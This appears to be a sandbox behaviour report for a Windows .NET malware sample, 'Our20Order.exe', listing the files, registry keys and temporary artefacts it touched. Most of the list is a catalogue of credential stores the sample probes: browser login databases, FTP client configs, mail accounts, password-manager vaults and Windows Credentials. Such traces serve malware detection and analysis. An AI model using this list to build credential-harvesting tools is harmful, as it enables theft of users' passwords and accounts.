C:\Users\Seven01\AppData\LocalNichrome\Default\Login Data
C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalRockMelt\Login Data
C:\Users\Seven01\AppData\LocalRockMelt\Default\Login Data
C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalSpark\Login Data
C:\Users\Seven01\AppData\LocalSpark\Default\Login Data
C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalChromium\Login Data
C:\Users\Seven01\AppData\LocalChromium\Default\Login Data
C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalTitan Browser\Login Data
C:\Users\Seven01\AppData\LocalTitan Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalTorch\Login Data
C:\Users\Seven01\AppData\LocalTorch\Default\Login Data
C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Login Data
C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Default\Login Data
C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Login Data
C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalCocCoc\Browser\Login Data
C:\Users\Seven01\AppData\LocalCocCoc\Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalVivaldi\Login Data
C:\Users\Seven01\AppData\LocalVivaldi\Default\Login Data
C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalComodo\Chromodo\Login Data
C:\Users\Seven01\AppData\LocalComodo\Chromodo\Default\Login Data
C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalSuperbird\Login Data
C:\Users\Seven01\AppData\LocalSuperbird\Default\Login Data
C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalCoowon\Coowon\Login Data
C:\Users\Seven01\AppData\LocalCoowon\Coowon\Default\Login Data
C:\Users\Seven01\AppData\Local\Mustang Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Mustang Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalMustang Browser\Login Data
C:\Users\Seven01\AppData\LocalMustang Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\360Browser\Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\360Browser\Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\Local360Browser\Browser\Login Data
C:\Users\Seven01\AppData\Local360Browser\Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalCatalinaGroup\Citrio\Login Data
C:\Users\Seven01\AppData\LocalCatalinaGroup\Citrio\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome SxS\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome SxS\Login Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome SxS\Default\Login Data
C:\Users\Seven01\AppData\Local\Orbitum\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Orbitum\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalOrbitum\Login Data
C:\Users\Seven01\AppData\LocalOrbitum\Default\Login Data
C:\Users\Seven01\AppData\Local\Iridium\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Iridium\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalIridium\Login Data
C:\Users\Seven01\AppData\LocalIridium\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\Login Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Login Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\Seven01\AppData\Local\QupZilla\profiles\default\browsedata.db
C:\Users\Seven01\AppData\Roaming\Opera
C:\Users\Seven01\AppData\Roaming\.purple\accounts.xml
C:\Users\Seven01\Documents\SuperPutty
C:\Program Files (x86)\FTPShell\ftpshell.fsi
C:\Users\Seven01\AppData\Roaming\Notepad++\plugins\config\NppFTP\NppFTP.xml
C:\Program Files (x86)\oZone3D\MyFTP\myftp.ini
C:\Users\Seven01\AppData\Roaming\FTPBox\profiles.conf
C:\Program Files (x86)\Sherrod Computers\sherrod FTP\favorites
C:\Program Files (x86)\FTP Now\sites.xml
C:\Program Files (x86)\NexusFile\userdata\ftpsite.ini
C:\Users\Seven01\AppData\Roaming\NexusFile\ftpsite.ini
C:\Users\Seven01\Documents\NetSarang\Xftp\Sessions
C:\Users\Seven01\AppData\Roaming\NetSarang\Xftp\Sessions
C:\Program Files (x86)\EasyFTP\data
C:\Users\Seven01\AppData\Roaming\SftpNetDrive
C:\Program Files (x86)\AbleFTP7\encPwd.jsd
C:\Program Files (x86)\AbleFTP7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP8\encPwd.jsd
C:\Program Files (x86)\AbleFTP8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP9\encPwd.jsd
C:\Program Files (x86)\AbleFTP9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP10\encPwd.jsd
C:\Program Files (x86)\AbleFTP10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP11\encPwd.jsd
C:\Program Files (x86)\AbleFTP11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP12\encPwd.jsd
C:\Program Files (x86)\AbleFTP12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP13\encPwd.jsd
C:\Program Files (x86)\AbleFTP13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP14\encPwd.jsd
C:\Program Files (x86)\AbleFTP14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP14\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp7\encPwd.jsd
C:\Program Files (x86)\JaSFtp7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp8\encPwd.jsd
C:\Program Files (x86)\JaSFtp8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp9\encPwd.jsd
C:\Program Files (x86)\JaSFtp9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp10\encPwd.jsd
C:\Program Files (x86)\JaSFtp10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp11\encPwd.jsd
C:\Program Files (x86)\JaSFtp11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp12\encPwd.jsd
C:\Program Files (x86)\JaSFtp12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp13\encPwd.jsd
C:\Program Files (x86)\JaSFtp13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp14\encPwd.jsd
C:\Program Files (x86)\JaSFtp14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp14\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize7\encPwd.jsd
C:\Program Files (x86)\Automize7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize8\encPwd.jsd
C:\Program Files (x86)\Automize8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize9\encPwd.jsd
C:\Program Files (x86)\Automize9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize10\encPwd.jsd
C:\Program Files (x86)\Automize10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize11\encPwd.jsd
C:\Program Files (x86)\Automize11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize12\encPwd.jsd
C:\Program Files (x86)\Automize12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize13\encPwd.jsd
C:\Program Files (x86)\Automize13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize14\encPwd.jsd
C:\Program Files (x86)\Automize14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize14\data\settings\ftpProfiles-j.jsd
C:\Users\Seven01\AppData\Roaming\Cyberduck
C:\Users\Seven01\AppData\Roaming\iterate_GmbH
C:\Users\Seven01\.config\fullsync\profiles.xml
C:\Users\Seven01\AppData\Roaming\FTPInfo\ServerList.xml
C:\Users\Seven01\AppData\Roaming\FTPInfo\ServerList.cfg
C:\Program Files (x86)\FileZilla\Filezilla.xml
C:\Users\Seven01\AppData\Roaming\FileZilla\filezilla.xml
C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml
C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml
C:\Program Files (x86)\Staff-FTP\sites.ini
C:\Users\Seven01\AppData\Roaming\BlazeFtp\site.dat
C:\Program Files (x86)\Fastream NETFile\My FTP Links
C:\Program Files (x86)\GoFTP\settings\Connections.txt
C:\Users\Seven01\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
C:\Program Files (x86)\DeluxeFTP\sites.xml
C:\Windows\wcx_ftp.ini
C:\Users\Seven01\AppData\Roaming\wcx_ftp.ini
C:\Users\Seven01\wcx_ftp.ini
C:\Users\Seven01\AppData\Roaming\GHISLER\wcx_ftp.ini
C:\Program Files (x86)\FTPGetter\Profile\servers.xml
C:\Users\Seven01\AppData\Roaming\FTPGetter\servers.xml
C:\Program Files (x86)\WS_FTP\WS_FTP.INI
C:\Windows\WS_FTP.INI
C:\Users\Seven01\AppData\Roaming\Ipswitch
C:\Users\Seven01\site.xml
C:\Users\Seven01\AppData\Local\PokerStars*
C:\Users\Seven01\AppData\Local\ExpanDrive
C:\Users\Seven01\AppData\Roaming\Steed\bookmarks.txt
C:\Users\Seven01\AppData\Roaming\FlashFXP
C:\ProgramData\FlashFXP
C:\Users\Seven01\AppData\Local\INSoftware\NovaFTP\NovaFTP.db
C:\Users\Seven01\AppData\Roaming\NetDrive\NDSites.ini
C:\Users\Seven01\AppData\Roaming\NetDrive2\drives.dat
C:\ProgramData\NetDrive2\drives.dat
C:\Users\Seven01\AppData\Roaming\SmartFTP
C:\Users\Seven01\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
C:\Users\Seven01\Documents\*.tlp
C:\Users\Seven01\Documents\*.bscp
C:\Users\Seven01\Documents\*.vnc
C:\Users\Seven01\Desktop\*.vnc
C:\Users\Seven01\Documents\mSecure
C:\ProgramData\Syncovery
C:\Program Files (x86)\FreshWebmaster\FreshFTP\FtpSites.SMF
C:\Users\Seven01\AppData\Roaming\BitKinex\bitkinex.ds
C:\Users\Seven01\AppData\Roaming\UltraFXP\sites.xml
C:\Users\Seven01\AppData\Roaming\FTP Now\sites.xml
C:\Program Files (x86)\Odin Secure FTP Expert\QFDefault.QFQ
C:\Program Files (x86)\Odin Secure FTP Expert\SiteInfo.QFP
C:\Program Files (x86)\Foxmail\mail
C:\Foxmail*
C:\Users\Seven01\AppData\Roaming\Pocomail\accounts.ini
C:\Users\Seven01\Documents\Pocomail\accounts.ini
C:\Users\Seven01\AppData\Roaming\GmailNotifierPro\ConfigData.xml
C:\Users\Seven01\AppData\Roaming\DeskSoft\CheckMail
C:\Program Files (x86)\WinFtp Client\Favorites.dat
C:\Windows\32BitFtp.TMP
C:\Windows\32BitFtp.ini
C:\FTP Navigator\Ftplist.txt
C:\Softwarenetz\Mailing\Daten\mailing.vdt
C:\Users\Seven01\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
C:\Users\Seven01\Documents\*Mailbox.ini
C:\Users\Seven01\Documents\yMail2\POP3.xml
C:\Users\Seven01\Documents\yMail2\SMTP.xml
C:\Users\Seven01\Documents\yMail2\Accounts.xml
C:\Users\Seven01\Documents\yMail\ymail.ini
C:\Users\Seven01\AppData\Roaming\TrulyMail\Data\Settings\user.config
C:\Users\Seven01\Documents\*.spn
C:\Users\Seven01\Desktop\*.spn
C:\Users\Seven01\AppData\Roaming\To-Do DeskList\tasks.db
C:\Users\Seven01\AppData\Roaming\stickies\images
C:\Users\Seven01\AppData\Roaming\stickies\rtf
C:\Users\Seven01\AppData\Roaming\NoteFly\notes
C:\Users\Seven01\AppData\Roaming\Conceptworld\Notezilla\Notes8.db
C:\Users\Seven01\AppData\Roaming\Microsoft\Sticky Notes\StickyNotes.snt
C:\Users\Seven01\Documents
C:\Users\Seven01\Documents\*.kdbx
C:\Users\Seven01\Desktop
C:\Users\Seven01\Desktop\*.kdbx
C:\Users\Seven01\Documents\*.kdb
C:\Users\Seven01\Desktop\*.kdb
C:\Users\Seven01\Documents\Enpass
C:\Users\Seven01\Documents\My RoboForm Data
C:\Users\Seven01\Documents\1Password
C:\Users\Seven01\AppData\Local\Temp\Mikrotik\Winbox
C:\Windows\Microsoft.NET\Framework\v2.0.50727\NETAPI32.DLL
C:\Windows\System32\netapi32.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\netutils.dll
C:\Windows\System32\netutils.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\srvcli.dll
C:\Windows\System32\srvcli.dll
C:\Users\Seven01\AppData\Roaming\E62877
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck
C:\Users\Seven01\AppData\Roaming\Microsoft\Credentials
C:\Users\Seven01\AppData\Roaming\Microsoft\Credentials\*
C:\Users\Seven01\AppData\Local\Microsoft\Credentials
C:\Users\Seven01\AppData\Local\Microsoft\Credentials\*
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe
C:\Windows\Temp

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\Our20Order.exe.config
C:\Users\Seven01\AppData\Local\Temp\Our20Order.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.dll
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.pdb
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.0.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest
C:\Users\Seven01\AppData\Local\Temp\CSC322517D57E1C4C98B6C2462FF1F8FDB.TMP
C:\Users\Seven01\AppData\Local\Temp\RESA661.tmp
C:\Windows\System32\tzres.dll
C:\Windows\System32\netapi32.dll
C:\Windows\System32\netutils.dll
C:\Windows\System32\srvcli.dll
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Write Files

C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.tmp
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.0.cs
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.dll
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.cmdline
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.out
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.err
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.pdb
C:\Users\Seven01\AppData\Local\Temp\CSC322517D57E1C4C98B6C2462FF1F8FDB.TMP
C:\Users\Seven01\AppData\Local\Temp\RESA661.tmp
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe

Delete Files

C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.tmp
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.pdb
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.0.cs
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.dll
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.cmdline
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.err
C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.out
C:\Users\Seven01\AppData\Local\Temp\RESA661.tmp
C:\Users\Seven01\AppData\Local\Temp\CSC322517D57E1C4C98B6C2462FF1F8FDB.TMP
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v4.0.30319
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v4.0.30319\SKUs\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v4.0.30319\SKUs\default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Our20Order.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\NGen\Policy\v4.0
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Servicing
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 024
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
